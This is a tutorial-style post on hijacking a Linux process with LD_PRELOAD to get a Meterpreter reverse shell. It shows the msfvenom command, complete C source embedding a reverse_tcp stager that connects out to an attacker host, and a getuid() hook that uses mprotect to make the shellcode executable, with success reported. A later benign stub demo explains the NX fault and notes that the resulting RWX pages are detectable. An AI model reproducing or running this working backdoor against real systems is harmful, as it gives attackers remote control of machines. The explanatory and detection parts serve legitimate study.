Getting a shell by loading a Metasploit-generated .so through LD_PRELOAD
First generate a C-format payload with msfvenom: msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=x.x.x.x lport=7777 -f c > test.c (the -f c output is just an unsigned char array holding the stager; it has to be wrapped in a function before it can be built into a library).
After completing test.c it looks like this:
Compile: gcc -fPIC -shared -o test.so test.c
LD_PRELOAD hijack: LD_PRELOAD=./test.so id
Running it produces an error:
Segmentation fault
The first guess was a non-executable stack: gcc/ld enable NX by default, so pages that hold data cannot be executed. The real location of the problem is slightly different, though. The shellcode array is a global, so it sits in the .data segment of test.so, which the loader maps read/write but not execute; calling into it therefore faults. Adding -z execstack at compile time does not help here: that flag only marks the stack executable, the payload is not on the stack, and the process being hijacked (id) was itself built with NX. The protection has to be changed at run time from inside the library. A Stack Overflow answer shows the way: call mprotect on the page(s) containing the shellcode. Its prototype is int mprotect(void *addr, size_t len, int prot), and addr must be page-aligned, so the start and end of the buffer are rounded out to page boundaries first.
The modified program is as follows:
```c
#include <stdint.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>

/* Round an address down / up to a page boundary; mprotect() requires a
 * page-aligned start address, so the region is widened to whole pages. */
#define PAGE_START(P) ((uintptr_t)(P) & ~(pagesize-1))
#define PAGE_END(P) (((uintptr_t)(P) + pagesize - 1) & ~(pagesize-1))

/* Stager emitted by msfvenom (linux/x64/meterpreter/reverse_tcp). */
unsigned char shellcode[] =
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
"\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
"\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x1e\x61\xc0\xa8"
"\xe8\x81\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
"\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
"\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
"\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
"\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";

/* Hook getuid(): id(1) calls it early, so the preloaded library's copy
 * runs the stager inside the id process. */
uid_t getuid(void)
{
    uintptr_t pagesize = sysconf(_SC_PAGE_SIZE);
    /* Make the page(s) holding the shellcode executable (RWX). */
    mprotect((void *)PAGE_START(shellcode),
             PAGE_END(shellcode + sizeof(shellcode)) - PAGE_START(shellcode),
             PROT_READ|PROT_WRITE|PROT_EXEC);
    int (*ret)() = (int(*)())shellcode;
    ret();      /* the stager does not return */
    return 0;
}
```
Recompile, LD_PRELOAD again.
Shell obtained successfully.
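The reason the first build faulted and the second one worked can be checked without a Metasploit stager. The following is an added example, not code from the post: it puts a harmless six-byte x86-64 stub (mov eax, 42; ret) in the data segment exactly where the post's shellcode array lives, reads that page's permissions from /proc/self/maps, applies the same page-rounded mprotect() as the post's code, and then calls the stub. It assumes Linux on x86-64 and a /proc filesystem; the function names set_prot, page_perms and run_stub are this example's own.

```c
/* Added example: data-segment shellcode is not executable until
 * mprotect() is applied. Assumes Linux, x86-64, /proc mounted. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

/* Harmless stub standing in for the stager: mov eax, 42 ; ret */
unsigned char stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

/* Widen [p, p+len) to whole pages and set its protection, as the post's
 * PAGE_START/PAGE_END macros do. Returns mprotect()'s result. */
int set_prot(const void *p, size_t len, int prot)
{
    uintptr_t pagesize = (uintptr_t)sysconf(_SC_PAGE_SIZE);
    uintptr_t start = (uintptr_t)p & ~(pagesize - 1);
    uintptr_t end = ((uintptr_t)p + len + pagesize - 1) & ~(pagesize - 1);
    return mprotect((void *)start, end - start, prot);
}

/* Fill perms with the "rwxp"-style string of the mapping that contains
 * addr, taken from /proc/self/maps. Returns 1 if found, 0 otherwise. */
int page_perms(const void *addr, char perms[5])
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return 0;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        char p[5];
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, p) != 3)
            continue;
        if ((uintptr_t)addr >= lo && (uintptr_t)addr < hi) {
            memcpy(perms, p, 5);
            found = 1;
            break;
        }
    }
    fclose(f);
    return found;
}

/* Make the stub's page executable, then call into it.
 * Returns the stub's value (42), or -1 if mprotect() failed. */
int run_stub(void)
{
    if (set_prot(stub, sizeof stub, PROT_READ | PROT_WRITE | PROT_EXEC) != 0)
        return -1;
    int (*fn)(void) = (int (*)(void))(uintptr_t)stub;
    return fn();
}

int main(void)
{
    char before[5] = "", after[5] = "";
    page_perms(stub, before);      /* expected "rw-p": calling now would fault */
    int r = run_stub();
    page_perms(stub, after);       /* expected "rwxp" after mprotect() */
    printf("stub page: %s -> %s, stub returned %d\n", before, after, r);
    return r == 42 ? 0 : 1;
}
```

Build and run with gcc -o nx_demo nx_demo.c && ./nx_demo. Two practical notes: hooking getuid() works for id because id calls it, but a __attribute__((constructor)) function fires when the library is loaded regardless of which libc symbols the target uses; and the price of this approach is a readable, writable and executable page in the target's data segment, which is exactly the kind of RWX mapping that memory-scanning tools flag in /proc/PID/maps.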